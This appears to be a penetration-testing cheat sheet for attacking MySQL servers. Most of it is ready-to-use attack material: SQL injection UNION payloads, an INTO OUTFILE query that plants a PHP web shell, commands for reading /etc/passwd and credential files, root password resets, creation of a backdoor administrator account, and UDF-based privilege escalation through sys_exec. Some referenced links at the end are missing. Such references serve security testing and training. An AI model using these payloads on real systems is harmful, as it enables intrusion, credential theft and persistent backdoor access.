show databases;
use <database>;
show tables;
describe <table_name>;
select grantee, table_schema, privilege_type FROM schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Try to execute code
select do_system('id');
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h -e 'show databases;'
MySQL arbitrary read file by client
Actually, when you try to load data local into a table the content of a file the MySQL or MariaDB server asks the client to read it and send the content. Then, if you can tamper a mysql client to connect to your own MyQSL server, you can read arbitrary files.
Please notice that this is the behaviour using:
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
(Notice the "local" word)
Because without the "local" you can get:
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Mysql User
It will be very interesting if mysql is running as root:
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
mysql> use mysql
mysql> select user,password from user;
Create a new user and grant him privileges
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bash
Privilege Escalation via library
You can find compiled versions of this libraries in sqlmap: locate and locate lib_mysqludf_sys.dllInstead of locate you can also use whereis to search for this libraries inside the host.
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/';
create function sys_exec returns integer soname '';
select sys_exec('id > /tmp/out.txt');
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
Extracting MySQL credentials from the database
SELECT User,Host,Password FROM mysql.user;
SELECT User,Host,authentication_string FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"
Extracting MySQL credentials from files
Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-sys-maint
cat /etc/mysql/debian.cnf
You can use these credentials to login in the mysql database.
Inside the file: /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the ones that you can extract from mysql.user inside the database).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Initial PoC:In this paper you can see a complete description of the attack and even how to extend it to RCE:Here you can find an overview of the attack: